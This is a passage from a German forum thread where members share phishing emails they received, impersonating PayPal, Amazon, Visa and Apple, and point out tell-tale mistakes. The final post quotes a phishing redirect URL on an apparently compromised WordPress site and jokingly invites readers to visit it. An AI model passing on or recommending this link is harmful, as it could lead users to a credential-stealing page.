    5 November 2002
    Beiträge:
    9.968
  46. vaGem

    vaGem Bekanntes Mitglied

    Registriert seit:
    6 Juni 2002
    Beiträge:
    766
    Ist gestern bei mir eingetrudelt
    Angeblich hab ich meine E-Mailaddy bei Pay-Pal geändert und soll sie jetzt überprüfen
    ob die stimmt :icon_funny:

    Leider haben die Burschen 2 Fehler gemacht ;)
    1. Hab ich auf dieser Mail addy wo es draufkam kein Pay-Pal Konto
    2. Sie hab statt Pay-Pal Pay-PaI genommen, man beachte das große i



  47. JoPa

    JoPa Allround-Nichtsnutz

    Registriert seit:
    22 April 2001
    Beiträge:
    6.373

    Hab ich auch bekommen.
    Der größte Fehler sind aber die mangelhaften Deutschkenntnise... und wenn man sich erst den link anschaut...
  48. JoPa

    JoPa Allround-Nichtsnutz

    Registriert seit:
    22 April 2001
    Beiträge:
    6.373
    Neuer Versuch an Amazon-Daten zu kommen:

    Rechnungsadresse ist ein Hallenbad auf St. Pauli :icon_lol::icon_lol::icon_lol:
  49. g202e

    g202e The Long Man

    Registriert seit:
    7 Januar 2003
    Beiträge:
    5.514
    Gestern gleich ZWEIMAL bekommen:
    visa1.JPG

    Der Link führt dann zu:
    visa2.JPG
  50. vaGem

    vaGem Bekanntes Mitglied

    Registriert seit:
    6 Juni 2002
    Beiträge:
    766
    Endlich mal was neues im Firmenmailfach

    Dumm nur das niemand in der Firma ein Appleprodukt hat ;)

    Die Weiterleitung geht nach
    http://www.thepenkridgeadvertiser.co.uk//wp-content/plugins/davoset/index.html

    Hab nicht draufgeklickt, aber mutige können ja mal schauen was sich dahinter verbirgt ;)